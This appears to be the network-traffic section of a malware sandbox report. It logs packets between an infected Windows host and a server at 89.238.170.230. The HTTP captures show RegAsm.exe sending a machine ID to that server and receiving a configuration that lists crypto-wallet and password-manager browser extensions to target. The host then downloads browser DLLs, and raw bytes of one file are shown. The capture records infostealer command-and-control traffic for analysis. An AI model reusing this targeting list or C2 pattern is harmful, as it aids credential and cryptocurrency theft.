Mar 29, 2024 14:25:55.239691019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239777088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.239824057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.455919981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.456008911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.456096888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.456096888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457297087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457351923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457371950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457398891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457415104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457439899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457515955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457559109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457576990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457619905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457700014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457752943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457767963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457811117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457811117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457854033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.457878113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.457925081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.458019018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.458061934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.681377888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.681459904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.681560993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.681560993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.682760954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.682804108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.682818890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.682832956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.682846069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.682862997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.682882071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.684114933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.684148073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.684170008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.684204102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.911700964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.911722898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.911923885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.912435055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.912467957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.912487984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.912503958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.912503958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.912535906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.912563086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.913494110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.913541079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.913546085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.913554907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.913569927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.913584948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.913599968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.913619995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.124105930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.124121904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.124284029 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.124347925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.124392033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.124419928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.124461889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.124953032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.124999046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125005007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125037909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125407934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125452995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125456095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125492096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125560045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125613928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125646114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125688076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125701904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125751019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.125755072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.125794888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.126773119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.126821995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.353414059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.353430033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.353580952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.353590965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.353624105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.353672028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.353720903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.353950024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354001045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354039907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354087114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354258060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354300976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354312897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354357958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354572058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354618073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354645014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354691982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354789972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354834080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.354895115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.354937077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.558563948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.558618069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.578866959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.578890085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.578912973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.578915119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.578927040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.578947067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.578995943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579032898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579073906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579116106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579158068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579199076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579212904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579248905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579265118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579304934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579330921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579376936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579411983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579448938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579452991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579492092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579539061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579577923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.579602003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.579639912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.774730921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.774749994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.774784088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.774811983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.793298960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.793343067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.793530941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.793544054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.793570042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.793581963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.793781996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.793795109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.793823957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.793834925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.794966936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795007944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795022964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795059919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795078993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795114994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795145035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795182943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795196056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795233011 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795262098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795299053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795371056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795403957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.795423985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.795465946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:56.993541956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:56.993597984 CET	49699	80	192.168.2.7	89.238.170.230

HTTP Request Dependency Graph

89.238.170.230

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	89.238.170.230	80	4812	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Mar 29, 2024 14:23:53.631287098 CET	315	OUT	POST / HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Content-Length: 98 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 64 31 66 63 39 35 63 36 31 37 39 62 65 34 62 30 62 34 66 39 33 65 66 66 36 61 62 33 66 30 38 66 Data Ascii: machineId=9e146be9-c76a-4720-bcdb-53011b87bd06\|user&configId=d1fc95c6179be4b0b4f93eff6ab3f08f
Mar 29, 2024 14:23:53.924786091 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:23:53 GMT Content-Type: text/html; charset=utf-8 Content-Length: 7337 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"1ca9-mg6Vjw9w+FCHyp5WKhpOssfkaus" Data Raw: 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 33 38 2e 31 37 30 2e 32 33 30 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 33 38 2e 31 37 30 2e 32 33 30 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 33 38 2e 31 37 30 2e 32 33 30 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 0a 6c Data Ascii: libs_nss3:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlll
Mar 29, 2024 14:23:53.924809933 CET	1286	IN	Data Raw: 69 62 73 5f 6d 6f 7a 67 6c 75 65 3a 68 74 74 70 3a 2f 2f 38 39 2e 32 33 38 2e 31 37 30 2e 32 33 30 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 6f 7a 67 6c 75 65 2e 64 6c 6c 0a 6c 69 62 Data Ascii: ibs_mozglue:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dlllibs_freebl3:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dlllibs_softokn3:http://89.238.170.230/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllew
Mar 29, 2024 14:23:53.924823999 CET	1286	IN	Data Raw: 6b 3b 52 6f 6e 69 6e 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 6d 65 74 61 3a 6e 6b 62 69 68 66 62 65 6f 67 61 65 61 6f 65 68 6c 65 66 6e 6b 6f 64 62 65 66 67 70 67 6b 6e 6e 3b 4d 65 74 61 4d 61 73 Data Ascii: k;Ronin;Local Extension Settingsews_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settingssstmnfo_System Info.txt:System Information: \|Installed applications:\|wlts_daedalus:Daedalus;26;Daedalus Mainnet;;log,*cache,chain
Mar 29, 2024 14:23:53.924844980 CET	1286	IN	Data Raw: 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 69 63 6f 6e 65 78 3a 66 6c 70 69 63 69 69 6c 65 6d 67 68 62 6d 66 61 6c 69 63 61 6a 6f 6f 6c 68 6b 6b 65 6e 66 65 6c 3b 49 43 4f 4e 65 78 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 Data Ascii: on Settingsews_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settingsews_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settingsews_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settin
Mar 29, 2024 14:23:53.927921057 CET	1286	IN	Data Raw: 78 3a 6e 6c 62 6d 6e 6e 69 6a 63 6e 6c 65 67 6b 6a 6a 70 63 66 6a 63 6c 6d 63 66 67 67 66 65 66 64 6d 3b 4d 45 57 5f 43 58 3b 53 79 6e 63 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 74 6f 6e 3a 6e 70 68 70 6c 70 67 6f Data Ascii: x:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settingsews_ton:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settingsews_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settingsews_ton_ex:nphplpgoakhhjchkkhmiggak
Mar 29, 2024 14:23:53.927936077 CET	1286	IN	Data Raw: 6b 61 6e 64 63 6c 62 6c 62 3b 42 69 74 77 61 72 64 65 6e 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 78 74 6e 74 6e 73 5f 6d 69 63 72 6f 73 6f 66 74 41 66 4c 3a 66 69 65 64 62 66 67 63 6c 65 64 64 6c 62 63 6d 67 Data Ascii: kandclblb;Bitwarden;Local Extension Settingsxtntns_microsoftAfL:fiedbfgcleddlbcmgdigjgdfcggjcion;Microsoft Autofill Local;Local Extension Settingsxtntns_microsoftAfS:fiedbfgcleddlbcmgdigjgdfcggjcion;Microsoft Autofill Sync;Sync Extension Set
Mar 29, 2024 14:23:54.774912119 CET	660	IN	Data Raw: 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 73 6c 6f 70 65 3a 70 6f 63 6d 70 6c 70 61 63 63 61 6e 68 6d 6e 6c 6c 62 62 6b 70 67 66 6c 69 69 6d 6a 6c 6a 67 6f 3b 53 6c 6f 70 65 20 57 61 6c 6c 65 74 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 Data Ascii: sion Settingsews_slope:pocmplpaccanhmnllbbkpgfliimjljgo;Slope Wallet;Local Extension Settingsews_trust:egjidjbpglichdcondbcbdnbeeppgdph;Trust Wallet Extension;Local Extension Settingsews_safepalext:lgmpcpglpngdoalbgeoldeajfclnhafa;Safepal E
Mar 29, 2024 14:23:54.781445980 CET	187	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:23:55.054435968 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:23:54 GMT Content-Type: application/octet-stream Content-Length: 2042296 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:48 GMT ETag: "62548404-1f29b8" Expires: Fri, 29 Mar 2024 13:53:54 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@B
Mar 29, 2024 14:23:55.054471016 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: USWV]u~t@p0W~1HFDtx0W1^_[]1HFDUWVu3'u7=t
Mar 29, 2024 14:23:55.054549932 CET	1286	IN	Data Raw: 5d e9 07 00 00 00 cc cc cc cc cc cc cc 55 89 e5 57 56 83 e4 f8 83 ec 10 8b 45 14 8b 0d 14 e0 1d 10 31 e9 89 4c 24 0c 83 f8 03 73 32 8b 4d 10 8b 55 0c 8b 75 08 8d 7c 24 04 89 57 fc 89 0f 8b 4e 04 50 57 52 ff 71 18 ff 15 38 c7 1d 10 89 47 fc 83 f8 Data Ascii: ]UWVE1L$s2MUu\|$WNPWRq8Gt34$\|$jh1NL$1pe^_]xtP51HD$$USWV]CECE +K1M4uGt'EH0
Mar 29, 2024 14:23:55.054567099 CET	259	IN	Data Raw: 91 44 01 00 00 85 d2 0f 85 05 02 00 00 ff 81 40 01 00 00 eb 3b 8b 02 89 81 48 01 00 00 eb bd 8d 81 2c 01 00 00 89 45 dc 31 ff b8 80 00 00 00 66 83 b9 2c 01 00 00 7f 77 91 83 b9 28 01 00 00 00 0f 84 e6 01 00 00 80 79 53 00 0f 85 75 02 00 00 89 c2 Data Ascii: D@;H,E1f,w(ySuW/MFB>1EE1UE\|ju7UD?u\|1u_DDDDLLD
